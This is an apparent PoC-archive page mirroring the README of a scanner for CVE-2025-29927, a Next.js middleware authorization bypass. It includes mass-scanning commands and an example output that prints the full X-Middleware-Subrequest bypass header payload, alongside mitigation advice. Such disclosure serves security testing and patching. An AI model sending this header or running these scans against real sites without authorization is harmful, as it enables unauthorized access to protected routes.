Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source
https://github.com/gotr00t0day/CVE-2025-29927
Associated Vulnerability
Title:Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description:Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
Next.js Middleware Bypass Scanne
Readme
# CVE-2025-29927

## Next.js Middleware Bypass Scanner (CVE-2025-29927)

CVE-2025-29927 is a specialized security tool for detecting the Next.js middleware bypass vulnerability (CVE-2025-29927) affecting Next.js versions 11.1.4 through 15.2.2. This critical vulnerability allows attackers to bypass security controls by sending a specially crafted HTTP header.

## About the Vulnerability

The Next.js middleware bypass vulnerability (CVE-2025-29927) allows attackers to circumvent authorization controls by sending a malicious `X-Middleware-Subrequest` header that confuses the middleware processing logic. This can lead to unauthorized access to protected resources and routes.

**CVSS Score:** 9.1 (Critical)

## Features

- Fast concurrent scanning of multiple targets
- SSL certificate verification bypass option for IP-based scanning
- Silent mode for automation and focused output
- Detailed vulnerability information (status codes, bypass headers)
- Endpoint discovery for comprehensive testing

## Installation

```bash
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927

# Install requirements
pip install -r requirements.txt
```

## Usage

```bash
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
```

### Command Line Arguments

- `-t, --target`: Single target to scan (e.g., example.com or https://example.com)
- `-f, --file`: File containing list of targets (one per line)
- `-c, --concurrency`: Number of concurrent scans (default: 5)
- `-k, --insecure`: Disable SSL certificate verification (useful for IP addresses)
- `-s, --silent`: Silent mode - only show vulnerable targets

### Examples

Scan a single target:
```bash
python CVE-2025-29927.py -t example.com
```

Scan multiple targets from a file:
```bash
python CVE-2025-29927.py -f targets.txt
```

Scan with SSL verification disabled:
```bash
python CVE-2025-29927.py -t 192.168.1.1 -k
```

Automated scanning with silent mode:
```bash
python CVE-2025-29927.py -f targets.txt -k -s
```

Scan with a custom Header:
```bash
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
```

## Output

For vulnerable targets, MiddleWay displays:
- The vulnerable endpoint
- Original status code
- Bypassed status code
- The bypass header used for successful exploitation

Example output:
```
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
  Original status: 401
  Bypassed status: 200
  Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
```

## Mitigation

To mitigate this vulnerability:
1. Upgrade to Next.js 14.2.25, 15.2.3 or later
2. If upgrading is not possible, block the `X-Middleware-Subrequest` header at your WAF or server level

## Disclaimer

This tool is provided for security research and defensive purposes only. Always obtain proper authorization before scanning any systems you don't own. The authors are not responsible for any misuse of this tool.

## License

MIT
File Snapshot

 [4.0K]  /data/pocs/538006495b78c43a07acbba493be1aecbc2a26e4
├── [7.4K]  CVE-2025-29927.py
├── [3.0K]  README.md
└── [  60]  requirements.txt

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →